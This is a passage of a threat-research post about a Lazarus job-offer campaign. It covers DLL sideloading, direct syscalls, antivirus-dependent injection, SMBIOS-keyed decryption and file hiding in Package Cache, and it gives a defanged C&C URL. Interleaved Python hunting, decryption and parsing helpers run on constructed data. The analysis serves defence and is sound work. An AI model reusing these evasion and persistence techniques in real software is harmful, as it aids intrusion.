  1713. <guid isPermaLink="false">https://decoded.avast.io/?p=8332</guid>
  1714.  
  1715. <description><![CDATA[<p>Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is [&#8230;]</p>
  1717. ]]></description>
  1718. <content:encoded><![CDATA[
  1719. <h2 class="wp-block-heading">Key Points</h2>
  1720.  
  1721.  
  1722.  
  1723. <ul>
  1724. <li>Avast discovered a new campaign targeting specific individuals through fabricated job offers.&nbsp;</li>
  1725.  
  1726.  
  1727.  
  1728. <li>Avast uncovered the full attack chain, from the infection vector to deployment of the <code>“FudModule 2.0”</code> rootkit with a 0-day <code>Admin -&gt; Kernel</code> exploit.&nbsp;</li>
  1729.  
  1730.  
  1731.  
  1732. <li>Avast found a previously undocumented <code>Kaolin</code> RAT which, in addition to standard RAT functionality, can change the last write timestamp of a selected file and load any DLL binary received from the C&amp;C server. We also believe it was loading FudModule along with a 0-day exploit.&nbsp;</li>
  1733. </ul>
  1734.  
  1735.  
  1736.  
  1737. <h2 class="wp-block-heading">Introduction</h2>
  1738.  
  1739.  
  1740.  
  1741. <p>In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is evident from previous research where the Lazarus group exploited vulnerable drivers and performed several rootkit techniques to effectively blind security products and achieve better persistence.&nbsp;</p>
  1742.  
  1743.  
  1744.  
  1745. <p>In this instance, Lazarus sought to blind security products by exploiting a vulnerability in the default Windows driver, appid.sys (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" target="_blank" rel="noreferrer noopener">CVE-2024-21338</a>). More information about this vulnerability can be found in a corresponding <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/" target="_blank" rel="noreferrer noopener">blog post</a>.&nbsp;</p>
  1746.  
  1747.  
  1748.  
  1749. <p>This indicates that Lazarus likely allocated additional resources to develop such attacks. Prior to exploitation, Lazarus deployed the toolset meticulously, employing fileless malware and encrypting the arsenal onto the hard drive, as detailed later in this blog post.&nbsp;</p>
  1750.  
  1751.  
  1752.  
  1753. <p>Furthermore, the nature of the attack suggests that the victim was carefully selected and highly targeted, as there likely needed to be some level of rapport established with the victim before executing the initial binary. Deploying such a sophisticated toolset alongside the exploit indicates considerable resourcefulness.&nbsp;</p>
  1754.  
  1755.  
  1756.  
  1757. <p>This blog post will present a technical analysis of each module within the entire attack chain. This analysis aims to establish connections between the toolset arsenal used by the Lazarus group and previously published research.&nbsp;</p>
  1758.  
  1759.  
  1760.  
  1761. <h2 class="wp-block-heading">Initial access&nbsp;</h2>
  1762.  
  1763.  
  1764.  
  1765. <p>The attacker initiates the attack by presenting a fabricated job offer to an unsuspecting individual, using social engineering to establish contact and build rapport. While the specific communication platform remains unknown, previous research by <a href="https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing" target="_blank" rel="noreferrer noopener">Mandiant</a> and <a href="https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/" target="_blank" rel="noreferrer noopener">ESET</a> suggests that delivery vectors may include LinkedIn, WhatsApp, email or other platforms. The attacker then sends a malicious ISO file, disguised as a VNC tool, as part of the <a href="https://securelist.com/apt-trends-report-q3-2023/110752/" target="_blank" rel="noreferrer noopener">interviewing process</a>. ISO files are becoming very attractive to attackers because, since Windows 10, an ISO file is mounted automatically on double-click and the operating system makes its contents readily accessible. This may also serve as a potential Mark-of-the-Web (MotW) bypass.&nbsp;</p>
  1766.  
  1767.  
  1768.  
  1769. <p>Having established rapport, the attacker tricks the victim into mounting the ISO file, which contains three files: <code>AmazonVNC.exe</code>, <code>version.dll</code> and <code>aws.cfg</code>. The victim is then led to execute <code>AmazonVNC.exe</code>.&nbsp;</p>
  1770.  
  1771.  
  1772.  
  1773. <p>The <code>AmazonVNC.exe</code> executable only pretends to be the Amazon VNC client; it is in fact a legitimate Windows application called <code>choice.exe</code> that ordinarily resides in the <code>System32</code> folder. This executable is used for sideloading: the legitimate <code>choice.exe</code> loads the malicious <code>version.dll</code>. Sideloading is a popular technique among attackers for evading detection, since the malicious DLL executes in the context of a legitimate application.&nbsp;</p>
  1774.  
  1775.  
  1776.  
  1777. <p>When <code>AmazonVNC.exe</code> is executed, it loads <code>version.dll</code>. This malicious DLL uses native Windows API functions in an attempt to avoid defensive techniques such as user-mode API hooks; all native API functions are invoked through direct syscalls. The malicious functionality is implemented in one of the exported functions rather than in <code>DllMain</code>, which contains no code and simply returns 1, while the other exported functions contain nothing but a Sleep call.&nbsp;</p>
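<p>The sideloading described above leaves a recognisable trace in image-load telemetry: a process whose PE <code>OriginalFileName</code> is <code>choice.exe</code> but whose on-disk name is something else, loading a <code>version.dll</code> that does not live in the Windows system directory. The following hunting script is an added example and is not code from the Avast post; the event records it runs over are constructed, Sysmon-style ImageLoad events (fields <code>Image</code>, <code>ImageLoaded</code>, <code>OriginalFileName</code>), not real telemetry.</p>

```python
"""Hunt for the sideloading pattern: a renamed copy of the legitimate
choice.exe (AmazonVNC.exe) loading a version.dll from outside the Windows
system directory.  Added example, not code from the Avast post; the records
below are constructed Sysmon-style ImageLoad events, not real telemetry."""
from dataclasses import dataclass

# DLL names that this chain abuses for sideloading (extend as needed).
SIDELOAD_DLLS = {"version.dll"}
# Directories from which a load of these DLLs is expected and benign.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

SAMPLE_EVENTS = [  # constructed sample input
    {"Image": r"C:\Windows\System32\choice.exe",      # benign: real choice.exe,
     "ImageLoaded": r"C:\Windows\System32\version.dll",  # real version.dll
     "OriginalFileName": "choice.exe"},
    {"Image": r"E:\AmazonVNC.exe",                    # mounted ISO, renamed choice.exe
     "ImageLoaded": r"E:\version.dll",
     "OriginalFileName": "choice.exe"},
    {"Image": r"C:\Program Files\Foo\foo.exe",        # third-party app with its own copy
     "ImageLoaded": r"C:\Program Files\Foo\version.dll",
     "OriginalFileName": "foo.exe"},
]


@dataclass
class Finding:
    image: str
    loaded: str
    severity: str
    reason: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def check_event(ev: dict):
    """Return a Finding for a suspicious load, or None for a benign one."""
    dll = _basename(ev["ImageLoaded"])
    if dll not in SIDELOAD_DLLS:
        return None
    if _dirname(ev["ImageLoaded"]) in SYSTEM_DIRS:
        return None  # the normal, expected load path
    reasons = [f"{dll} loaded from outside the Windows system directory"]
    severity = "medium"
    # A binary whose on-disk name differs from its PE OriginalFileName
    # (choice.exe masquerading as AmazonVNC.exe) raises the confidence.
    orig = ev.get("OriginalFileName", "").lower()
    if orig and orig != _basename(ev["Image"]):
        reasons.append(f"process renamed: on disk as {_basename(ev['Image'])}, "
                       f"OriginalFileName is {orig}")
        severity = "high"
    return Finding(ev["Image"], ev["ImageLoaded"], severity, "; ".join(reasons))


def hunt(events):
    """Run check_event over a list of events and keep only the findings."""
    return [f for f in (check_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f.severity.upper(), f.image, "->", f.loaded, "|", f.reason)
```

<p>The third constructed event (a third-party application shipping its own <code>version.dll</code>) is kept at medium severity on purpose: loads of this DLL from an application folder do occur legitimately, and it is the renamed system binary that makes the second event high-confidence.</p>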
  1778.  
  1779.  
  1780.  
  1781. <p>After the DLL obtains the correct syscall numbers for the current Windows version, it is ready to spawn an <code>iexpress.exe</code> process to host a further malicious payload that resides in the third file, <code>aws.cfg</code>. Injection is performed only if Kaspersky antivirus is installed on the victim’s computer, which seems intended to evade Kaspersky detection. If Kaspersky is not installed, the malware executes the payload by creating a thread in the current process, with no injection. The <code>aws.cfg</code> file, which is the next-stage payload, is obfuscated by VMProtect, perhaps in an effort to make reverse engineering more difficult. The payload is capable of downloading shellcode from a Command and Control (C&amp;C) server, which we believe is a legitimate but compromised website selling marble for construction. The official website is <code>https://www[.]henraux.com/</code>, and the attacker was able to download shellcode from <code>https://www[.]henraux.com/sitemaps/about/about.asp</code>.&nbsp;</p>
  1782.  
  1783.  
  1784.  
  1785. <p>In detailing our findings, we faced challenges extracting the shellcode from the C&amp;C server, as the malicious URL was unresponsive.&nbsp;</p>
  1786.  
  1787.  
  1788.  
  1789. <p>By analyzing our telemetry, we uncovered potential threats in one of our clients, indicating a significant correlation between the loading of shellcode from the C&amp;C server via an ISO file and the subsequent appearance of the <code>RollFling</code>, which is a new undocumented loader that we discovered and will delve into later in this blog post.&nbsp;</p>
  1790.  
  1791.  
  1792.  
  1793. <p>Moreover, the delivery method of the ISO file exhibits tactical similarities to those employed by the Lazarus group, a fact previously noted by researchers from <a href="https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing" target="_blank" rel="noreferrer noopener">Mandiant</a> and <a href="https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/" target="_blank" rel="noreferrer noopener">ESET</a>.&nbsp;</p>
  1794.  
  1795.  
  1796.  
  1797. <p>In addition, a <code>RollSling</code> sample was identified on the victim machines, displaying code similarities with the <code>RollSling</code> sample discussed in <a href="https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/" target="_blank" rel="noreferrer noopener">Microsoft&#8217;s research</a>. Notably, the <code>RollSling</code> instance discovered in our client&#8217;s environment was delivered by the <code>RollFling</code> loader, confirming our belief in the connection between the absent shellcode and the initial loader <code>RollFling</code>. For visual confirmation, refer to the first screenshot, which shows the <code>RollSling</code> code (with its SHA) from <a href="https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/" target="_blank" rel="noreferrer noopener">Microsoft</a>&#8217;s report, while the second screenshot shows the code derived from our <code>RollSling</code> sample.&nbsp;</p>
  1798.  
  1799.  
  1800. <div class="wp-block-image">
  1801. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="481" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-1024x481.png" alt="" class="wp-image-8347" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-1024x481.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-300x141.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-768x361.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-1536x721.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4.png 1725w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Image illustrates the <code>RollSling </code>code identified by Microsoft. SHA: <br><code>d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca</code>.</figcaption></figure></div>
  1802.  
  1803.  
  1804. <div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container"><div class="wp-block-image">
  1805. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="477" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-1024x477.png" alt="" class="wp-image-8346" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-1024x477.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-300x140.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-768x358.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-1536x715.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2.png 1733w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Image showcases the <code>RollSling</code> code discovered within our target. SHA: <code>68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f</code>.</figcaption></figure></div>
  1806.  
  1807.  
  1808. <p>In the next paragraphs, we are going to explain every component in the execution chain, starting with the initial <code>RollFling</code> loader, continuing with the subsequently loaded <code>RollSling</code> loader, and then the final <code>RollMid</code> loader. Finally, we will analyze the <code>Kaolin</code> RAT, which is ultimately loaded by the chain of these three loaders.&nbsp;</p>
  1809. </div></div>
  1810.  
  1811.  
  1812.  
  1813. <h2 class="wp-block-heading">Loaders</h2>
  1814.  
  1815.  
  1816.  
  1817. <h3 class="wp-block-heading">RollFling</h3>
  1818.  
  1819.  
  1820.  
  1821. <p>The <code>RollFling</code> loader is a malicious DLL that is established as a service, indicating the attacker&#8217;s initial attempt at achieving persistence by registering as a service. Accompanying this <code>RollFling</code> loader are essential files crucial for the consistent execution of the attack chain. Its primary role is to kickstart the execution chain, where all subsequent stages operate exclusively in memory. Unfortunately, we were unable to ascertain whether the DLL file was installed as a service with administrator rights or just with standard user rights.&nbsp;</p>
  1822.  
  1823.  
  1824.  
  1825. <p>The loader acquires the System Management BIOS (SMBIOS) table by utilizing the Windows API function <code>GetSystemFirmwareTable</code>. Beginning with Windows 10, version 1803, any user mode application can access SMBIOS information. SMBIOS serves as the primary standard for delivering management information through system firmware.&nbsp;</p>
  1826.  
  1827.  
  1828.  
  1829. <p>By calling the <code>GetSystemFirmwareTable</code> function (see Figure 1), the loader retrieves <code>SMBIOSTableData</code>, which is then used as the key for XOR-decrypting the encrypted <code>RollSling</code> loader. Without the correct <code>SMBIOSTableData</code>, a 32-byte key, the <code>RollSling</code> decryption fails and execution of the malware does not proceed to the next stage. This suggests a highly targeted attack aimed at a specific individual.&nbsp;</p>
  1830.  
  1831.  
  1832.  
  1833. <p>This in turn suggests that, before establishing persistence by registering the <code>RollFling</code> loader as a service, the attacker had to gather the <code>SMBIOS</code> table from the victim machine and transmit it to the C&amp;C server, which could then reply with the next stage. This additional stage, called <code>RollSling</code>, is stored in the same folder as <code>RollFling</code> but with the <code>".nls"</code> extension.&nbsp;</p>
  1834.  
  1835.  
  1836.  
  1837. <p>After successfully <code>XOR</code>-decrypting <code>RollSling</code>, <code>RollFling</code> loads the decrypted <code>RollSling</code> into memory and continues execution there.&nbsp;</p>
  1838.  
  1839.  
  1840. <div class="wp-block-image">
  1841. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="524" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-1024x524.png" alt="" class="wp-image-8350" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-1024x524.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-300x153.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-768x393.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table.png 1469w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 1: Obtaining SMBIOS firmware table provider</figcaption></figure></div>
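<p>The environmental keying described above is why an analyst cannot unpack a captured <code>.nls</code> file without an SMBIOS dump from the victim machine. The helper below is an added example, not code from the Avast post, of the triage step an analyst performs once that dump is available: XOR the file with the key and accept the result only if it parses as a PE image. The post states only that the key is 32 bytes of <code>SMBIOSTableData</code>; that the key is the first 32 bytes of the raw table and that it repeats across the ciphertext are assumptions of this example, and the SMBIOS dumps and the payload are constructed.</p>

```python
"""Analyst helper for RollFling's SMBIOS-keyed XOR layer.  Added example,
not code from the Avast post.  Assumptions (not stated in the post): the
32-byte key is the start of the raw SMBIOS table and repeats over the data."""

KEY_LEN = 32  # the post states a 32-byte key


def derive_key(smbios_table: bytes) -> bytes:
    """Take the 32-byte key from the raw table (assumed: its first 32 bytes)."""
    if len(smbios_table) < KEY_LEN:
        raise ValueError("SMBIOS table shorter than the expected key length")
    return smbios_table[:KEY_LEN]


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """MZ stub plus a PE signature at e_lfanew: the check a loader performs."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decrypt_nls(nls_bytes: bytes, smbios_table: bytes):
    """Return the decrypted RollSling image, or None if the key was wrong."""
    plain = xor_with_key(nls_bytes, derive_key(smbios_table))
    return plain if looks_like_pe(plain) else None


# --- constructed demo data (not real samples) --------------------------------
def _fake_pe() -> bytes:
    """Minimal buffer that passes looks_like_pe(); stands in for RollSling."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr) + b"\x00" * 16


VICTIM_SMBIOS = bytes(range(0x10, 0x10 + 64))   # constructed "victim" table
OTHER_SMBIOS = bytes(range(0x80, 0x80 + 64))    # constructed "analyst VM" table
ENCRYPTED_NLS = xor_with_key(_fake_pe(), derive_key(VICTIM_SMBIOS))


def demo():
    """(decrypts with the victim's table, fails with any other table)."""
    return (decrypt_nls(ENCRYPTED_NLS, VICTIM_SMBIOS) is not None,
            decrypt_nls(ENCRYPTED_NLS, OTHER_SMBIOS) is None)


if __name__ == "__main__":
    print(demo())
```

<p>The second half of <code>demo()</code> is the practical point: run on an analysis VM whose firmware table differs from the victim's, the same file yields garbage and the loader stops, which is exactly the behaviour a sandbox sees when it detonates this sample.</p>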
  1842.  
  1843.  
  1844. <h3 class="wp-block-heading">RollSling</h3>
  1845.  
  1846.  
  1847.  
  1848. <p>The <code>RollSling</code> loader, initiated by <code>RollFling</code>, is executed in memory, a choice that may help the attacker evade detection by security software. The primary function of <code>RollSling</code> is to locate a binary blob in the same folder as <code>RollSling</code>; if it is not found there, the loader looks in the Package Cache folder instead. This binary blob holds various stages and configuration data essential for the malicious functionality, and must have been uploaded to the victim machine by some previous stage in the infection chain.&nbsp;</p>
  1849.  
  1850.  
  1851.  
  1852. <p>The reasoning behind a single binary blob holding multiple files and configuration values is twofold. Firstly, it is more efficient to keep all the information in one file and, secondly, most of the binary blob can be encrypted, which adds another layer of evasion and lowers the chance of detection.&nbsp;</p>
  1853.  
  1854.  
  1855.  
  1856. <p><code>RollSling</code> scans the current folder looking for a specific binary blob. To determine which file in the folder is the right one, it first reads 4 bytes that give the size of the data to read. Once that data is read, its bytes are reversed and saved in a temporary variable, which then goes through several condition checks, such as an MZ header check. If the MZ header check passes, the loader looks for the <code>“StartAction”</code> export function in the extracted binary. If all conditions are met, it loads the next stage, <code>RollMid</code>, into memory. The attackers did not use any specific file name or extension for the binary blob that would make it easy to find in the folder; instead, they identify the right file through the several conditions it has to meet. This is also a defensive evasion technique, making it harder for defenders to find the binary blob on the infected machine.&nbsp;</p>
  1857.  
  1858.  
  1859.  
  1860. <p>The next stage in the execution chain is the third loader, called <code>RollMid</code>, which is also executed in the computer&#8217;s memory.&nbsp;</p>
  1861.  
  1862.  
  1863.  
  1864. <p>Before the execution of the <code>RollMid</code> loader, the malware creates two folders, named in the following way:&nbsp;</p>
  1865.  
  1866.  
  1867.  
  1868. <ul>
  1869. <li>%driveLetter%:\\ProgramData\\Package Cache\\[0-9A-Z]{8}-DF09-AA86-YI78-[0-9A-Z]{12}\\&nbsp;</li>
  1870.  
  1871.  
  1872.  
  1873. <li>%driveLetter%:\\ProgramData\\Package Cache\\[0-9A-Z]{8}-09C7-886E-II7F-[0-9A-Z]{12}\\&nbsp;</li>
  1874. </ul>
  1875.  
  1876.  
  1877.  
  1878. <p>These folders serve as destinations for moving the binary blob, now renamed with a newly generated name and a <code>".cab"</code> extension. <code>RollSling</code> loader will store the binary blob in the first created folder, and it will store a new temporary file, whose usage will be mentioned later, in the second created folder.&nbsp;&nbsp;</p>
  1879.  
  1880.  
  1881.  
  1882. <p>The attacker utilizes the <code>"Package Cache"</code> folder, a common repository for software installation files, to better hide its malicious files in a folder full of legitimate files. In this approach, the attacker also leverages the <code>".cab"</code> extension, which is the usual extension for the files located in the <code>Package Cache</code> folder. By employing this method, the attacker is trying to effectively avoid detection by relocating essential files to a trusted folder.&nbsp;</p>
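<p>The two folder-name patterns above are unusually good hunting material: the fixed middle groups <code>DF09-AA86-YI78</code> and <code>09C7-886E-II7F</code> contain letters outside the hexadecimal alphabet (<code>Y</code>, <code>I</code>), so no genuine GUID-named installer folder can ever match them. The script below, an added example that is not code from the Avast post, turns the two patterns into a filesystem hunt over a directory listing and reports any <code>.cab</code> files inside matching folders. The listing it runs over is constructed; the hex-looking folder name in it is a placeholder for a legitimate <code>Package Cache</code> entry.</p>

```python
"""Hunt for the RollSling staging folders under Package Cache.  Added example,
not code from the Avast post.  Runs over a constructed directory listing."""
import re
from pathlib import PureWindowsPath

# Folder-name patterns quoted in the post.  The fixed groups contain non-hex
# letters, so legitimate GUID-named folders cannot collide with them.
PATTERNS = {
    "blob_folder": re.compile(r"^[0-9A-Z]{8}-DF09-AA86-YI78-[0-9A-Z]{12}$"),
    "tmp_folder":  re.compile(r"^[0-9A-Z]{8}-09C7-886E-II7F-[0-9A-Z]{12}$"),
}
PACKAGE_CACHE = ("programdata", "package cache")   # any drive letter


def classify_dir(path: str):
    """Return the pattern label for a suspicious folder, or None."""
    p = PureWindowsPath(path)
    parts = [s.lower() for s in p.parts]         # ['c:\\', 'programdata', ...]
    if len(parts) < 4 or tuple(parts[1:3]) != PACKAGE_CACHE:
        return None
    for label, rx in PATTERNS.items():
        if rx.match(p.name):
            return label
    return None


def hunt(listing):
    """listing: iterable of (directory path, [file names]) as os.walk yields.

    Returns (label, directory, [cab files]) for every matching folder; the
    post says the blob is stored there renamed with a '.cab' extension."""
    findings = []
    for directory, files in listing:
        label = classify_dir(directory)
        if label:
            cabs = [f for f in files if f.lower().endswith(".cab")]
            findings.append((label, directory, cabs))
    return findings


SAMPLE_LISTING = [  # constructed; folder and file names are placeholders
    (r"C:\ProgramData\Package Cache\{E46ECA8B-0C3D-4F0C-9F75-A4AE5A2E1E53}v14.0",
     ["vc_redist.x64.exe"]),                                     # legitimate
    (r"C:\ProgramData\Package Cache\7A3F9C2E-DF09-AA86-YI78-1B2C3D4E5F60",
     ["K2J7Q4ZP.cab"]),                                          # blob folder
    (r"C:\ProgramData\Package Cache\Z9Y8X7W6-09C7-886E-II7F-0A1B2C3D4E5F",
     ["tmp1.tmp"]),                                              # temp folder
    (r"D:\Other\Package Cache\7A3F9C2E-DF09-AA86-YI78-1B2C3D4E5F60",
     ["x.cab"]),                                                 # wrong parent
]


if __name__ == "__main__":
    for label, directory, cabs in hunt(SAMPLE_LISTING):
        print(label, directory, cabs)
```

<p>On a live host the same <code>hunt()</code> takes the output of <code>os.walk()</code> over each <code>ProgramData\Package Cache</code> directory; the parent-folder check keeps the match anchored to the location the post describes rather than to the name alone.</p>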
  1883.  
  1884.  
  1885.  
  1886. <p>In the end, the <code>RollSling</code> loader calls an exported function called <code>"StartAction"</code>. This function is called with specific arguments, including information about the actual path of the <code>RollFling</code> loader, the path where the binary blob resides, and the path of a temporary file to be created by the <code>RollMid</code> loader.&nbsp;</p>
  1887.  
  1888.  
  1889. <div class="wp-block-image">
  1890. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="477" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-1024x477.png" alt="" class="wp-image-8352" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-1024x477.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-300x140.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-768x358.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3-1536x715.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-3.png 1733w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 2: Looking for a binary blob in the same folder as the <code>RollFling</code> loader</figcaption></figure></div>
  1891.  
  1892.  
  1893. <h3 class="wp-block-heading">RollMid</h3>
  1894.  
  1895.  
  1896.  
  1897. <p>The responsibility of the <code>RollMid</code> loader lies in loading key components of the attack and configuration data from the binary blob, while also establishing communication with a C&amp;C server.&nbsp;</p>
  1898.  
  1899.  
  1900.  
  1901. <p>The binary blob, containing essential components and configuration data, serves as a critical element in the proper execution of the attack chain. Unfortunately, our attempts to obtain this binary blob were unsuccessful, leading to gaps in our full understanding of the attack. However, we were able to retrieve the <code>RollMid</code> loader and certain binaries stored in memory.&nbsp;</p>
  1902.  
  1903.  
  1904.  
  1905. <p>Within the binary blob, the <code>RollMid</code> loader is a fundamental component located at the beginning (see Figure 3). The first 4 bytes of the binary blob give the size of the <code>RollMid</code> loader. Two more binaries are stored in the blob after the <code>RollMid</code> loader, followed by configuration data at the very end. These two binaries and the configuration data are additionally compressed and AES-encrypted, adding further layers of protection to the stored information.&nbsp;</p>
  1906.  
  1907.  
  1908.  
  1909. <p>As depicted, the first four bytes enclosed in the initial yellow box describe the size of the <code>RollMid </code>loader. This specific information is also important for parsing, enabling the transition to the subsequent section within the binary blob.&nbsp;</p>
  1910.  
  1911.  
  1912.  
  1913. <p>Located after the <code>RollMid</code> loader, there are two 4-byte values, distinguished by yellow and green colors. The former corresponds to the size of <code>FIRST_ENCRYPTED_DLL</code> section, while the latter (green box) signifies the size of <code>SECOND_ENCRYPTED_DLL</code> section. Notably, the second 4-byte value in the green box serves a dual purpose, not only describing a size but also at the same time constituting a part of the 16-byte AES key for decrypting the <code>FIRST_ENCRYPTED_DLL</code> section. Thanks to the provided information on the sizes of each encrypted DLL embedded in the binary blob, we are now equipped to access the configuration data section placed at the end of the binary blob.&nbsp;</p>
  1914.  
  1915.  
  1916. <div class="wp-block-image">
  1917. <figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="483" height="422" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/BinaryBlob.drawio.png" alt="" class="wp-image-8356" style="width:483px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/BinaryBlob.drawio.png 483w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/BinaryBlob.drawio-300x262.png 300w" sizes="(max-width: 483px) 100vw, 483px" /><figcaption class="wp-element-caption">Figure 3: Structure of the Binary blob&nbsp;</figcaption></figure></div>
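<p>As an added example that is not part of the original analysis or the loader's own code, the following Python parser splits a blob laid out as in Figure 3 into its sections for triage. It assumes, since the page does not say, that the size fields are unsigned 32-bit little-endian and that the two encrypted DLL sections directly follow the two size fields in that order; the encrypted sections are returned untouched and the AES key derivation is not reproduced.</p>

```python
"""Section parser for the RollMid binary blob layout (Figure 3).

Added example, not code from the loader or from Avast. Layout as described:

  [u32] size of the RollMid loader
  [...] RollMid loader
  [u32] size of FIRST_ENCRYPTED_DLL   (yellow box after the loader)
  [u32] size of SECOND_ENCRYPTED_DLL  (green box; also feeds the AES key)
  [...] FIRST_ENCRYPTED_DLL
  [...] SECOND_ENCRYPTED_DLL
  [...] CONFIGURATION_DATA (everything that remains)

Assumptions not stated on the page: size fields are little-endian, and the
two encrypted sections directly follow the two size fields, in that order.
"""
import struct
from dataclasses import dataclass


class BlobFormatError(ValueError):
    """Raised when the size fields do not fit the buffer."""


@dataclass(frozen=True)
class BinaryBlob:
    rollmid_loader: bytes
    first_encrypted_dll: bytes
    second_encrypted_dll: bytes
    configuration_data: bytes
    # Raw bytes of the "green box" value, kept because the analysis says this
    # field doubles as part of the 16-byte AES key for FIRST_ENCRYPTED_DLL.
    key_material_hint: bytes


def _read_u32(buf: bytes, off: int) -> int:
    if off + 4 > len(buf):
        raise BlobFormatError(f"truncated size field at offset {off}")
    return struct.unpack_from("<I", buf, off)[0]


def _take(buf: bytes, off: int, size: int, name: str) -> bytes:
    if off + size > len(buf):
        raise BlobFormatError(f"{name} ({size} bytes) runs past end of blob")
    return buf[off:off + size]


def parse_binary_blob(blob: bytes) -> BinaryBlob:
    """Split a blob into its sections without decrypting anything."""
    off = 0
    loader_size = _read_u32(blob, off)
    off += 4
    if loader_size == 0:
        raise BlobFormatError("RollMid loader size is zero")
    loader = _take(blob, off, loader_size, "RollMid loader")
    off += loader_size

    first_size = _read_u32(blob, off)
    second_size = _read_u32(blob, off + 4)
    key_hint = blob[off + 4:off + 8]   # the green-box bytes, verbatim
    off += 8

    first = _take(blob, off, first_size, "FIRST_ENCRYPTED_DLL")
    off += first_size
    second = _take(blob, off, second_size, "SECOND_ENCRYPTED_DLL")
    off += second_size

    config = blob[off:]
    if not config:
        raise BlobFormatError("no CONFIGURATION_DATA after the encrypted DLLs")
    return BinaryBlob(loader, first, second, config, key_hint)


def build_binary_blob(loader: bytes, first: bytes, second: bytes,
                      config: bytes) -> bytes:
    """Inverse of parse_binary_blob, used here only to construct test input."""
    return (struct.pack("<I", len(loader)) + loader
            + struct.pack("<II", len(first), len(second))
            + first + second + config)


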